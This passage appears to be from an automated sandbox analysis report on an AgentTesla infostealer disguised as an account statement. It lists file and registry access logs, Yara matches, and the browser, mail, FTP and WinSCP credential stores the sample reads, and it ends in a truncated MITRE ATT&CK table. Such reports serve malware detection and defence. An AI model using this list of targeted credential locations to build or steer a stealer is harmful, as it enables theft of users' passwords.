                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeQueries volume information: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2160120971.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.3349333951.0000000002A9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.3349333951.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UPDATED SSTATEMENT OF ACCOUNT.exe PID: 6516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3392, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TgfQNrhQjjseHY.exe PID: 4460, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4548, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.3349333951.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UPDATED SSTATEMENT OF ACCOUNT.exe PID: 6516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3392, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TgfQNrhQjjseHY.exe PID: 4460, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4548, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2160120971.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.3349333951.0000000002A9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.3349333951.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UPDATED SSTATEMENT OF ACCOUNT.exe PID: 6516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3392, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TgfQNrhQjjseHY.exe PID: 4460, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4548, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter                    		1
                    Scheduled Task/Job                    		311
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		12
